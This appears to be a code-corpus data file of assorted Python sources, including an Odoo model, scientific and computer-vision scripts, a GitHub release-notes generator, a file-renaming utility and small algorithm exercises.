'unique (emballage_id , produit_id )', 'Cette emballage est déja crée')\n ] \n \n name = fields.Char(string='Nom' , compute='_compute_name')\n \n @api.depends('produit_id', 'emballage_id')\n def _compute_name(self):\n for r in self:\n if(isinstance(r.produit_id.name , unicode)) and isinstance(r.emballage_id.name,unicode)and isinstance(r.emballage_id.unite,unicode):\n if r.emballage_id.unite == u'Piece':\n r.name= r.produit_id.name \n else :\n r.name= r.produit_id.name + \" \"+ (r.emballage_id.name).strip()+\" \"+r.emballage_id.unite\n \n \n @api.one \n @api.depends('produit_id','emballage_id')\n def _prix_unit(self):\n for r in self:\n r.prixunit=r.produit_id.prixunit*r.emballage_id.poids\n @api.one \n @api.depends('produit_id','emballage_id')\n def _prix_vente(self):\n for r in self:\n r.prixvente=r.produit_id.prixvente*r.emballage_id.poids\n print(\"r.produit_id.prixvente ****>>\" +str(r.produit_id.prixvente))\n print(\"r.emballage_id.poids ****>>\" +str(r.emballage_id.poids))\n print(\" r.prixvente ****>>\" +str( r.prixvente))\n \n \n\n \n quantitestocke=fields.Integer(\n string ='Stock',\n default=0.0,\n digits=(16, 3)\n )\n \n produit_id = fields.Many2one(\n string='Produit',\n required=True,\n index=True,\n comodel_name='gctjara.produits',\n ondelete='set null'\n )\n \n prixunit= fields.Float(\n# related='produit_id.prixunit,emballage_id.poids',\n string='Prix unitaire',\n# default='_prix_unit',\n compute='_prix_unit',\n store=True,\n digits=(16, 3)\n )\n prixvente= fields.Float(\n# related='produit_id.prixvente,emballage_id.poids',\n string='Prix de vente',\n# default='_prix_vente',\n compute='_prix_vente',\n store=True,\n digits=(16, 3)\n )\n emballage_id = fields.Many2one(\n comodel_name='gctjara.emballage',\n string='Emballage',\n )\n \n lignecmd_id = fields.One2many(\n string='Commandes Achats',\n comodel_name='gctjara.lignecmdachat',\n inverse_name='embalageproduit_id'\n ) \n \n lignecmdvente_id = fields.One2many(\n string='Commandes Ventes',\n comodel_name='gctjara.lignecmdvente',\n inverse_name='embalageproduit_id'\n ) \n \n","sub_path":"models/ProduitEmballee.py","file_name":"ProduitEmballee.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"406549382","text":"# -*- coding: utf-8 -*-\n# RESET ALL\n#from IPython import get_ipython\n#get_ipython().magic('reset -sf')\nimport glob\nimport errno\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef PolyArea(x,y):\n return 0.5*np.abs(np.dot(x,np.roll(y,1))-np.dot(y,np.roll(x,1)))\n\ndef SegmentLength(x1,x2,y1,y2):\n return np.sqrt((x2-x1)**2 + (y2-y1)**2)\n\n\ndef FracArea(fpath_in_fracNodes, fpath_in_dispVec, plotting = False, norm_by_len = False): \n \"\"\"\n Created on Tue May 7 15:22:48 2019\n \n calculates area of polygons created from combined roxol crack nodes and displacement vectors,\n i.e. in effect fracture area\n \n inputs: \n fpath_in_fracNodes: file path for fracture nodes in format (x0 y0 x1 y1 ... for node coordinates) per fracture, and of the form \" path + '*_fracNodes.txt' \"\n fpath_in_dispVec: file path for fracture displacement Vectors in format (dx00 dy00 dx01 dy01 dx10 dy10 dx11 dy11 ... for bidirectional node displacement) per fracture, and of the form \" path + '*_dispVec.txt' \"\n plotting: True/False input. displays plots or not. Standard: False\n norm_by_len = True/False input. normalizes fracture area by respective fracture length or not. Standard: True\n \n @author: olerab\n \"\"\" \n files_fracNodes = sorted(glob.glob(fpath_in_fracNodes))\n files_dispVec = sorted(glob.glob(fpath_in_dispVec))\n \n if len(files_fracNodes)!=len(files_dispVec):\n raise Exception('Error, need same number of files containing \"fracNodes\" and \"displacementVectors\"')\n \n cnt = 0\n frac_area_lib = {}\n frac_area = list()\n frac_area_max = list()\n frac_area_min = list()\n frac_area_avg = list()\n frac_area_med = list()\n frac_area_std = list()\n frac_length = list()\n # read frac nodes and displacement vectors, and store them as doubles\n #create figure for boxplots\n\n for cnt in range (0,len(files_fracNodes)):\n #fnodes = np.genfromtxt(fracNodeFile, delimiter = \"\\t\")\n file_fracNodes = open(files_fracNodes[cnt],'r')\n i = 0\n fracNodes = {}\n for line in file_fracNodes:\n data = line.split()\n fracNodes[i] = np.array(np.float_(data))\n i += 1\n file_fracNodes.close()\n \n #fnodes = np.genfromtxt(fracNodeFile, delimiter = \"\\t\")\n file_dispVec = open(files_dispVec[cnt],'r')\n i = 0\n dispVec = {}\n for line in file_dispVec:\n data = line.split()\n dispVec[i] = np.array(np.float_(data))\n i += 1\n file_dispVec.close()\n \n # calculate length of each fracture in a result step to normalize area at a later stage \n fraclen = list() \n for i in range(0,len(fracNodes)):\n segments = list()\n for k in range(0,int(len(fracNodes[i])/2-2)):\n segments.append(SegmentLength(fracNodes[i][2*k],fracNodes[i][2*k+2],fracNodes[i][2*k+1],fracNodes[i][2*k+3]))\n \n fraclen.append(np.sum(segments))\n \n # build polygon nodes by combining frac nodes and displacement vectors\n polyNodes = {}\n polyarea = list()\n \n #extract pairwise displacement vectors\n \n for j in range(0,len(fracNodes)):\n disp1 = np.empty_like(fracNodes[j])\n disp2 = np.empty_like(fracNodes[j])\n disp1[0::2] = dispVec[j][0::4]\n disp1[1::2] = dispVec[j][1::4]\n disp2[0::2] = dispVec[j][2::4]\n disp2[1::2] = dispVec[j][3::4]\n \n #for k in range (0,len(fracNodes[j])):\n polyNodes[j] = np.append(fracNodes[j] + disp1, np.flip(fracNodes[j] + disp2))\n polyNodesx = np.append(polyNodes[j][0:len(fracNodes[j]):2], polyNodes[j][len(fracNodes[j])+1::2])\n polyNodesy = np.append(polyNodes[j][1:len(fracNodes[j]):2], polyNodes[j][len(fracNodes[j])::2])\n \n # calculate polunomial area, normalizeby the length (if desired)\n polyarea.append(PolyArea(polyNodesx,polyNodesy))\n \n # plot polygons\n # if you need...\n #plt.plot(polyNodesx,polyNodesy)\n \n #plt.show()\n \n frac_area_max.append(np.max(polyarea))\n frac_area_min.append(np.min(polyarea))\n frac_area_avg.append(np.mean(polyarea))\n frac_area_med.append(np.median(polyarea))\n frac_area_std.append(np.std(polyarea))\n if norm_by_len == True:\n frac_area.append(np.sum(polyarea)/np.sum(fraclen))\n else:\n frac_area.append(np.sum(polyarea))\n frac_area_lib[cnt] = frac_area\n frac_length.append(np.sum(fraclen))\n \n \n #plotting\n if plotting == True:\n # -------------------- total fracture area at each step\n fig1 = plt.figure(figsize=(10,5))\n ax1 = fig1.add_subplot(111)\n line, = ax1.plot(frac_area, lw=2, marker='o', color='mediumvioletred')\n \n ax1.set_title(fpath_in_fracNodes[35:-16], fontsize=18)\n ax1.set_xlabel(\"Simulation Step\", fontsize=18)\n ax1.set_ylabel(\"Total Fracture Area\", fontsize=18)\n plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\n plt.grid(True)\n plt.show()\n fig1.savefig(fpath_in_fracNodes[:-15] + 'plot_TotalFracArea.png')\n \n # --------------------- max, min, mean, standard deviation at each step\n fig2 = plt.figure(figsize=(10,5))\n ax2 = fig2.add_subplot(111)\n #line, = ax2.plot(frac_area, lw=2)\n ax2.errorbar(np.linspace(0,len(frac_area_avg)-1,len(frac_area_avg)),frac_area_avg, yerr=[frac_area_min, frac_area_max], fmt='o', color='mediumvioletred')\n \n ax2.set_title(fpath_in_fracNodes[35:-16], fontsize=18)\n ax2.set_xlabel(\"Simulation Step\", fontsize=18)\n ax2.set_ylabel(\"Mean Fracture Area\", fontsize=18)\n \n ax2.plot(frac_area_med, lw=2, marker='o', color='red')\n plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\n plt.grid(True)\n plt.show()\n fig2.savefig(fpath_in_dispVec[:-13] + 'plot_MeanMaxFracArea.png')\n else:\n print('PLOTTING DISABLED. use arg plotting = True to show plots')\n \n\n \n # return fracture area value\n return frac_area, frac_length\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"python/work_in_progress/FracArea.py","file_name":"FracArea.py","file_ext":"py","file_size_in_byte":6357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"65110262","text":"import peewee_async\nfrom peewee import *\nfrom conf.op_conf import get_conf\nimport model\n\ndb = peewee_async.PooledMySQLDatabase(\n database=get_conf()['db'],\n user=get_conf()['username'],\n password=get_conf()['password'],\n host=get_conf()['host'],\n port=get_conf()['port']\n)\n\nobjs = peewee_async.Manager(db)\ndb.set_allow_sync(True)\n\n\nclass BaseModel(Model):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.trans = db.atomic_async # 将事务改成atomic_async\n self.objs = peewee_async.Manager(db) # 添加一个Manager类\n # add_time = DateTimeField(null=True, verbose_name=\"添加时间\")\n\n class Meta:\n database = db\n\n\ndef create_table():\n db.create_tables([model.index.Server, model.index.User])\n\n\nif __name__ == '__main__':\n create_table()","sub_path":"model/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"623474025","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nimport cv2\nimport numpy as np\nimport chainer\nimport glob\nimport os\nfrom chainer import serializers, optimizers, Variable, cuda\nimport chainer.functions as F\nfrom yolov2 import *\nfrom lib.utils import *\nfrom lib.image_generator import *\n\n\ndef generate_data(path):\n x = []\n t = []\n ground_truths = []\n img_orig = cv2.imread(path)\n #img = reshape_to_yolo_size(img_orig)\n img = cv2.resize(img_orig, (416, 416))\n w_fine = (float((img_orig.shape[1] / 32) * 32) / float(img_orig.shape[1]) )\n h_fine = (float((img_orig.shape[0] / 32) * 32) / float(img_orig.shape[0]) )\n \n fimg = img_orig.astype(np.float)\n input_height, input_width, _ = img.shape\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = np.asarray(img, dtype=np.float32) / 255.0\n img = img.transpose(2, 0, 1)\n x.append(img)\n\n\n ground_truths.append({\n \"x\": 0.67084,\n \"y\": 0.610435,\n \"w\": 0.227971 * w_fine,\n \"h\": 0.647691 * h_fine,\n \"label\": 0,\n }) \n\n t.append(ground_truths)\n x = np.array(x)\n return x, t, fimg\n# hyper parameters\ntrain_sizes = [320, 352, 384, 416, 448]\nitem_path = \"./items\"\nbackground_path = \"./backgrounds\"\ninitial_weight_file = \"./yolov2_darknet_coco.model\"\nweight_file = \"./yolov2_darknet_coco.model\"\nbackup_path = \"backup\"\nbackup_file = \"%s/backup.model\" % (backup_path)\nbatch_size = 16\nmax_batches = 1\nlearning_rate = 1e-5\nlearning_schedules = { \n \"0\" : 1e-5,\n \"500\" : 1e-4,\n \"10000\": 1e-5,\n \"20000\": 1e-6 \n}\n\nlr_decay_power = 4\nmomentum = 0.9\nweight_decay = 0.005\nn_classes = 80\nn_boxes = 5\n\n# load image generator\nprint(\"loading image generator...\")\ngenerator = ImageGenerator(item_path, background_path)\n\n# load model\nprint(\"loading initial model...\")\nyolov2 = YOLOv2(n_classes=n_classes, n_boxes=n_boxes)\n\nmodel = YOLOv2Predictor(yolov2)\nserializers.load_hdf5(weight_file, yolov2)\nmodel.unstable_seen = 0\nmodel.thresh = 0.5\n\nmodel.predictor.train = True\nmodel.predictor.finetune = False\ncuda.get_device(0).use()\n#model.to_gpu()\n\noptimizer = optimizers.MomentumSGD(lr=learning_rate, momentum=momentum)\noptimizer.use_cleargrads()\noptimizer.setup(model)\n#optimizer.add_hook(chainer.optimizer.WeightDecay(weight_decay))\n\n# start to train\nprint(\"start grad-cam\")\nfor batch in range(max_batches):\n if str(batch) in learning_schedules:\n optimizer.lr = learning_schedules[str(batch)]\n\n # generate sample\n x, t, fimg = generate_data('./data/people.png')\n x = Variable(x)\n #x.to_gpu()\n\n # forward\n gcam_layer = 22\n loss = model.gcam(x, t, target=gcam_layer)\n print(\"batch: %d learning rate: %f loss: %f\" % (batch, optimizer.lr, loss.data))\n\n # backward and optimize\n optimizer.zero_grads()\n loss.backward(retain_grad=True)\n weights = np.mean(yolov2.gcamout.grad, axis=(2, 3))\n #weights = abs(weights)\n gcam = np.tensordot(weights[0], yolov2.gcamout.data[0], axes=(0, 0))\n gcam = (gcam > 0) * gcam / gcam.max()\n gcam = (gcam * 255)\n gcam = cv2.resize(np.uint8(gcam), (fimg.shape[1], fimg.shape[0]))\n heatmap = cv2.applyColorMap(gcam, cv2.COLORMAP_JET)\n gcam = fimg + np.float32(heatmap)\n gcam = 255 * gcam / gcam.max()\n \n for truth_index in range(len(t[0])):\n left = int(t[0][truth_index][\"x\"]*gcam.shape[1] - t[0][truth_index][\"w\"]*gcam.shape[1]/2 ) \n top = int(t[0][truth_index][\"y\"]*gcam.shape[0] - t[0][truth_index][\"h\"]*gcam.shape[0]/2 ) \n right = int(t[0][truth_index][\"x\"]*gcam.shape[1] + t[0][truth_index][\"w\"]*gcam.shape[1]/2 ) \n bottom = int(t[0][truth_index][\"y\"]*gcam.shape[0] + t[0][truth_index][\"h\"]*gcam.shape[0]/2 ) \n cv2.rectangle(\n gcam,\n (left, top), (right, bottom),\n (0, 128, 255),\n 1\n )\n cv2.imwrite('gcam-{}.png'.format(gcam_layer), gcam)\n\n\n","sub_path":"yolov2_gcam.py","file_name":"yolov2_gcam.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"363383969","text":"\"\"\"\nScript that pulls specifically formatted PR descriptions\nto create release notes.\n\"\"\"\n\nimport os\nfrom enum import Enum\nimport requests\nimport json\nfrom github import Github\nimport argparse\nfrom datetime import datetime\n\n\nclass ReleaseNotes(object):\n class ExportType(Enum):\n TEXT = 0\n HTML = 1\n MARKDOWN = 2\n\n def __init__(self, release_notes):\n self.release_notes = release_notes\n\n def export(\n self,\n type_=ExportType.TEXT,\n file=None,\n title_text=\"Release Notes\",\n additional_text=\"\",\n ):\n if type_ == ReleaseNotes.ExportType.TEXT:\n output = self._get_txt_output(title_text, additional_text)\n elif type_ == ReleaseNotes.ExportType.HTML:\n output = self._get_html_output(title_text, additional_text)\n elif type_ == ReleaseNotes.ExportType.MARKDOWN:\n output = self._get_markdown_output(title_text, additional_text)\n else:\n raise NotImplementedError()\n\n if file:\n dir_path = os.path.dirname(os.path.realpath(__file__))\n print(\n \"Exporting release notes into file:\\n{}\\n\".format(dir_path + \"/\" + file)\n )\n with open(file, \"w+\") as output_file:\n output_file.write(output)\n\n return output\n\n def _get_txt_output(self, title_text, additional_text):\n output = \"\"\n\n output += title_text + \"\\n\\n\"\n output += additional_text + \"\\n\\n\"\n for key, values in self.release_notes.items():\n # ignore items placed in the general description and just get following\n # sections. Don't include section if empty\n if key != \"general updates\" and values:\n output += key.title() + \"\\n\"\n for value in values:\n output += \" - \"\n output += ReleaseNotes._breakup_line(value)\n output += \"\\n\"\n output += \"\\n\"\n return output\n\n def _get_html_output(self, title_text, additional_text):\n output = \"\"\n\n output += \"\\n\\n\\n\\n\"\n output += \"

{}

\\n\".format(title_text)\n output += \"
\\n\"\n for line in additional_text.split(\"\\n\"):\n output += \"

{}

\\n\".format(line)\n output += \"
\\n\"\n for key, values in self.release_notes.items():\n # ignore items placed in the general description and just get following\n # sections. Don't include section if empty\n if key != \"general updates\" and values:\n output += \"

\" + key.title() + \"

\\n
    \\n\"\n for value in values:\n output += \"
  • \"\n output += ReleaseNotes._breakup_line(value)\n output += \"
  • \\n\"\n output += \"
\\n\"\n output += \"\\n\"\n return output\n\n def _get_markdown_output(self, title_text, additional_text):\n output = \"\"\n\n output += \"# {}\\n\\n\".format(title_text)\n output += additional_text.replace(\"\\n\", \"\\n\\n\") + \"\\n\\n\"\n for key, values in self.release_notes.items():\n # ignore items placed in the general description and just get following\n # sections. Don't include section if empty\n if key != \"general updates\" and values:\n output += \"## \" + key.title() + \"\\n\"\n for value in values:\n output += \" - \"\n output += ReleaseNotes._breakup_line(value)\n output += \"\\n\"\n output += \"\\n\"\n return output\n\n @staticmethod\n def _breakup_line(line):\n \"\"\"\n Keep it under 80 chars assuming two spaces, a dash, and another space in front\n ex:\n - this is a long line that we should probably break up into much smaller\n pieces so that's what this does. cool.\n \"\"\"\n output = line\n if len(line) > 76:\n output = \"\"\n words = line.split()\n total_length = 0\n\n # given a list of words, keep trying to add another word without going over\n # 76 chars\n while words and ((total_length + len(words[0])) < 76):\n total_length += len(words[0]) + 1 # 1 for space\n output += words[0] + \" \"\n del words[0]\n\n # hit 76 char limit or used all the words, new line\n output += \"\\n \"\n\n # more words? call this function recursively to continue breaking into chunks\n if words:\n output += ReleaseNotes._breakup_line(\" \".join(words))\n\n return output\n\n\ndef get_command_line_args():\n parser = argparse.ArgumentParser(description=\"Create release notes\")\n parser.add_argument(\n \"repo\", type=str, help=\"Tag to start getting release notes from.\"\n )\n parser.add_argument(\n \"from_tag\", type=str, help=\"Tag to start getting release notes from.\"\n )\n parser.add_argument(\n \"--to_tag\",\n type=str,\n default=\"latest\",\n help=\"Tag to stop collecting release notes at.\",\n )\n parser.add_argument(\n \"--file_name\",\n type=str,\n default=\"release_notes\",\n help=\"Name for file to export to. Don't include extention\",\n )\n parser.add_argument(\n \"--text\",\n action=\"store_const\",\n const=True,\n help=\"output a text file with release notes\",\n )\n parser.add_argument(\n \"--markdown\",\n action=\"store_const\",\n const=True,\n help=\"output a markdown file with release notes\",\n )\n parser.add_argument(\n \"--html\",\n action=\"store_const\",\n const=True,\n help=\"output an html file with release notes\",\n )\n parser.add_argument(\n \"--org\",\n type=str,\n default=\"uc-cdis\",\n help=\"Organization or person owning the specified repo\",\n )\n\n parser.add_argument(\n \"--github_access_token\",\n type=str,\n default=os.environ.get(\"ACCESS_TOKEN\"),\n help=\"\",\n )\n\n args = parser.parse_args()\n return args\n\n\ndef main(args=None):\n if args is None:\n args = get_command_line_args()\n if args.github_access_token:\n g = Github(args.github_access_token)\n else:\n g = Github()\n\n repo_path = args.org + \"/\" + args.repo\n repo = g.get_repo(repo_path)\n\n input_tag = args.from_tag\n\n if not input_tag:\n print(\"You didn't enter a git tag, can't get release notes.\")\n exit()\n\n tagged_commit_sha = get_commit_sha_from_tag(repo, input_tag)\n if not tagged_commit_sha:\n print(\n \"Tag {} doesn't exist in GitHub for repo: {}.\".format(\n input_tag, repo.full_name\n )\n )\n exit()\n\n tagged_commit = repo.get_commit(sha=tagged_commit_sha)\n tagged_commit_date = tagged_commit.commit.committer.date.isoformat()\n\n prs = get_pr_descriptions_since_date(\n tagged_commit_date, repo_path, github_access_token=args.github_access_token\n )\n\n release_notes_raw = {\"general updates\": []}\n for pr in prs:\n release_notes_raw = parse_pr_body(pr, release_notes_raw)\n\n release_notes = ReleaseNotes(release_notes_raw)\n additional_text = \"For: {}\\nNotes since tag: {}\\nGenerated: {}\\n\".format(\n repo.full_name, input_tag, datetime.now().date()\n )\n\n if args.markdown:\n release_notes.export(\n type_=ReleaseNotes.ExportType.MARKDOWN,\n file=args.file_name + \".md\",\n additional_text=additional_text,\n )\n\n if args.html:\n release_notes.export(\n type_=ReleaseNotes.ExportType.HTML,\n file=args.file_name + \".html\",\n additional_text=additional_text,\n )\n\n if args.text or not any([args.text, args.markdown, args.html]):\n release_notes.export(\n type_=ReleaseNotes.ExportType.TEXT,\n file=args.file_name + \".txt\",\n additional_text=additional_text,\n )\n\n\ndef get_pr_descriptions_since_date(\n tagged_commit_date, repo_path, github_access_token=None\n):\n get_pr_comments_query = \"\"\"query {\n search(first: 100, type: ISSUE, query: $QUERY) {\n edges {\n node {\n ... on PullRequest {\n title\n body\n }\n }\n }\n pageInfo {\n endCursor\n hasNextPage\n }\n }\n }\"\"\"\n get_pr_comments_query = get_pr_comments_query.replace(\n \"$QUERY\",\n '\"repo:{} state:closed type:pr created:>{}\"'.format(\n repo_path, tagged_commit_date\n ),\n )\n\n if github_access_token:\n headers = {\"Authorization\": \"Bearer {}\".format(github_access_token)}\n else:\n headers = {}\n\n data = json.dumps({\"query\": str(get_pr_comments_query)})\n response = requests.post(\n \"https://api.github.com/graphql\", headers=headers, data=data\n )\n prs = response.json().get(\"data\", {}).get(\"search\", {}).get(\"edges\", [])\n prs = [pr.get(\"node\", {}).get(\"body\") for pr in prs]\n return prs\n\n\ndef get_commit_sha_from_tag(repo, input_tag):\n tags = repo.get_tags()\n tagged_commit_sha = None\n for tag in tags:\n if tag.name == input_tag:\n tagged_commit_sha = tag.commit.sha\n\n return tagged_commit_sha\n\n\ndef parse_pr_body(body, release_notes):\n category = \"general updates\"\n for line in body.replace(\"\\r\", \"\").split(\"\\n\"):\n if line.startswith(\"###\"):\n category = line.replace(\"###\", \"\").strip().lower()\n if category not in release_notes:\n release_notes[category] = []\n elif line:\n line = parse_line(line)\n if line:\n release_notes[category].append(line)\n else:\n continue\n\n return release_notes\n\n\ndef parse_line(line):\n line = line.strip().strip(\"*\").strip().strip(\"-\").strip().strip(\"-\").strip()\n\n if (\n \"Please make sure to follow the [DEV guidelines]\" in line\n or line == \"Description about what this pull request does.\"\n or line == \"Implemented XXX\"\n or line == \"This pull request was generated automatically.\"\n or line == \"None\"\n ):\n return None\n\n return line\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"gen3git.py","file_name":"gen3git.py","file_ext":"py","file_size_in_byte":10419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"500682359","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n\ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value))\n idx2 = np.sort(idx)\n x1 = np.where(idx == idx2[0])\n x2 = np.where(idx == idx2[1])\n return array[x1], x1, array[x2], x2\n\n\ndef beamwidth(results):\n data = np.array(results)\n maximum_db = np.amax(data)\n print(data.size)\n x = np.linspace(0, 361, 361)\n xvals = np.linspace(0, 361, 1000)\n yinterp = np.interp(xvals, x, data)\n half_power1, halfpower_ind1, half_power2, halfpower_ind2 = find_nearest(yinterp, (maximum_db - 3))\n beamwidth_value = abs(xvals[halfpower_ind1] - xvals[halfpower_ind2])\n beamwidth_angle1 = xvals[halfpower_ind1]\n beamwidth_angle2 = xvals[halfpower_ind2]\n return beamwidth_value, half_power1, beamwidth_angle1, half_power2, beamwidth_angle2\n\n\ndef bandwidth_6dB(results):\n data = np.array(results)\n maximum_db = np.amax(data)\n x = np.linspace(0, 361, 361)\n xvals = np.linspace(0, 361, 1000)\n yinterp = np.interp(xvals, x, data)\n bandwidth_power1, bandwidth_ind1, bandwidth_power2, bandwidth_ind2 = find_nearest(yinterp, (maximum_db - 6))\n bandwidth_6dB_value = abs(xvals[bandwidth_ind1] - xvals[bandwidth_ind2])\n bandwidth_angle1 = xvals[bandwidth_ind1]\n bandwidth_angle2 = xvals[bandwidth_ind2]\n return bandwidth_6dB_value, bandwidth_power1, bandwidth_angle1, bandwidth_power2, bandwidth_angle2\n\n\ndef gain_calculator(frequency, input_power, gref, distance, results):\n data = np.array(results)\n Pr = np.sum(data)\n wavelength = 1 / frequency\n gain = (Pr * pow(4 * np.pi * distance, 2)) / (input_power * gref * pow(wavelength, 2))\n return gain\n\n\ndef directivity(beamwidth_angle1, beamwidth_angle2):\n kraus = 41.253 / (beamwidth_angle1 * beamwidth_angle2)\n tai_pereira = 22.181 / (pow(beamwidth_angle1, 2) * pow(beamwidth_angle2, 2))\n return kraus, tai_pereira\n\n\ndef total_calculation(results, frequency, input_power, gref, distance):\n print(\"calculatin total inside\")\n beamwidth_value, half_power1, beamwidth_angle1, half_power2, beamwidth_angle2 = beamwidth(results)\n print(\"calculating beamwidth\")\n bandwidth_6dB_value, bandwidth_power1, bandwidth_angle1, bandwidth_power2, bandwidth_angle2 = bandwidth_6dB(results)\n print(\"Bandwidth\")\n gain = gain_calculator(frequency, input_power, gref, distance, results)\n kraus, tai_pereira = directivity(beamwidth_angle1, beamwidth_angle2)\n print(\"Calculating finished\")\n\n return beamwidth_value, bandwidth_6dB_value, gain, kraus, tai_pereira\n\n\nif __name__ == \"__main__\":\n calibrate_cn0150()\n","sub_path":"calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"516106827","text":"def split(arr,num,pos):\n\t\n\tdup = []\n\tfor k in range(pos+1,num,1):\n\t\tdup.append(arr[k])\n\tfor j in range(0,pos+1,1):\n\t\tdup.append(arr[j])\n\tprint(\"Array after split and join is : \",dup)\n\t\n\n\narr = []\n\nnum = int(input(\"Enter the number of elements in an array : \"))\nfor i in range(0,num):\n\tprint(\"Enter element {}\".format(i))\n\telem = int(input())\n\tarr.append(elem)\n\npos = int(input(\"Enter the position after which you want a split : \"))\n\nsplit(arr,num,pos)","sub_path":"Anashka_folder/split_arr.py","file_name":"split_arr.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"507560273","text":"\nimport os\nimport re\nimport 清洗数据\nimport 下载封面\n\n\ndef file_name(file_dir):\n msg = {\n \"root\": [],\n \"dirs\": [],\n \"files\": [],\n\n }\n for root, dirs, files in os.walk(file_dir):\n # print(root) # 当前目录路径\n # print(dirs) # 当前路径下所有子目录\n # print(files) # 当前路径下所有非目录子文件\n msg[\"root\"] = root\n msg[\"dirs\"].append(dirs)\n msg[\"files\"].append(files)\n return msg\n\n\ndef file_extension(path):\n return os.path.splitext(path)[1]\n\n\ndef 格式化本地(url):\n msg = file_name(url)\n\n file_dict = {\"content\": [],\n \"后缀\": [],\n }\n\n for file in msg[\"files\"]:\n for i in file:\n file_dict[\"content\"].append(i)\n file_dict[\"后缀\"].append(file_extension(\n os.path.join(str(msg['root']), i))) # 文件后缀名\n\n 数据 = 清洗数据.match_id(file_dict)\n path = url\n num = 0\n while num < 数据[\"num\"]:\n # print(数据)\n # print(数据['id'][num])\n # print(file_dict['content'][num])\n # print(数据['has_chinese'])\n # print(file_dict['后缀'][num])\n old_name = os.path.join(path, file_dict['content'][num])\n\n 番号数据 = 下载封面.番号搜索(数据['id'][num])\n # print(番号数据)\n 标题 = re.sub(\"[/\\:*\\\"<>|?]+\", \" \", 番号数据['标题'])\n if 数据['id'][num] in 数据['has_chinese']:\n # print(数据['id'][num]+\"有中文\")\n if 'favorite' in file_dict['content'][num]:\n new_name = os.path.join(\n path, 数据['id'][num]+\"-C \"+标题+'[ favorite ]'+file_dict['后缀'][num])\n else:\n new_name = os.path.join(\n path, 数据['id'][num]+\"-C \"+标题+file_dict['后缀'][num])\n else:\n try:\n new_name = os.path.join(\n path, 数据['id'][num]+\" \"+标题+file_dict['后缀'][num])\n\n if 'favorite' in file_dict['content'][num]:\n new_name = os.path.join(\n path, 数据['id'][num]+\" \"+标题+'[ favorite ]'+file_dict['后缀'][num])\n else:\n new_name = os.path.join(\n path, 数据['id'][num]+\" \"+标题+file_dict['后缀'][num])\n except TypeError:\n with open(os.path.join(url, '下载失败.txt'), \"a\", encoding='utf-8', errors='ignore') as a: # 打开文件\n a.writelines(f\"下载失败:{数据['id'][num]}\\n\")\n a.close()\n try:\n os.rename(old_name, new_name)\n except FileNotFoundError:\n print(\"[WinError 2] 系统找不到指定的文件。\")\n except FileExistsError:\n new_name = os.path.join(\n path, 数据['id'][num]+\" \"+标题+file_dict['后缀'][num])\n os.rename(old_name, new_name)\n\n\n num += 1\n print(f'格式化前:{old_name}')\n print(f'格式化后:{new_name}')\n print(f'进度{num}/{数据[\"num\"]}')\n print()\n print()\n\n\n# 格式化本地(r'D:\\python')\n","sub_path":"python/自动化整理番号封面/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"19901874","text":"from collections import defaultdict,deque\nclass Solution:\n def minReorder(self, n: int, edges: List[List[int]]) -> int:\n\n output = 0\n edge_set = set()\n visited = set()\n adj = defaultdict(list)\n adj_stk = [0]\n visited.add(0)\n\n for edge in edges:\n edge_set.add(tuple(edge))\n adj[edge[0]].append(edge[1])\n adj[edge[1]].append(edge[0])\n\n while adj_stk!=[]:\n p =adj_stk.pop()\n for neigh in adj[p]:\n if neigh not in visited:\n if (p,neigh) in edge_set:\n output+=1\n visited.add(neigh)\n adj_stk.append(neigh)\n\n return output\n","sub_path":"leetcode_1466.py","file_name":"leetcode_1466.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"81349815","text":"#!/usr/bin/env python\n\"\"\"\nTests for database connections and actions\n\"\"\"\nfrom backend.query_database import query_database, fuzzy_query\nfrom backend.tests.base import BaseTestCase\n\n\nclass TestCitiesService(BaseTestCase):\n def test_get_city(self):\n \"\"\"Test passes if correct city is returned\"\"\"\n good_city = 'Des Moines'\n result = query_database(good_city)\n self.assertIsNotNone(result)\n\n def test_get_fuzzy_city(self):\n \"\"\"Test passes if result is not None\"\"\"\n good_city = 'Des Moines'\n result = fuzzy_query(good_city)\n self.assertIsNotNone(result)\n","sub_path":"backend/tests/test_cities.py","file_name":"test_cities.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"32823836","text":"# Given array of integers, find the maximal possible sum of some of its k consecutive elements.\n\n# + Example\n\n# - For inputArray = [2, 3, 5, 1, 6] and k = 2, the output should be\n# > arrayMaxConsecutiveSum(inputArray, k) = 8.\n# All possible sums of 2 consecutive elements are:\n# 2 + 3 = 5;\n# 3 + 5 = 8;\n# 5 + 1 = 6;\n# 1 + 6 = 7.\n# Thus, the answer is 8.\n\n# + 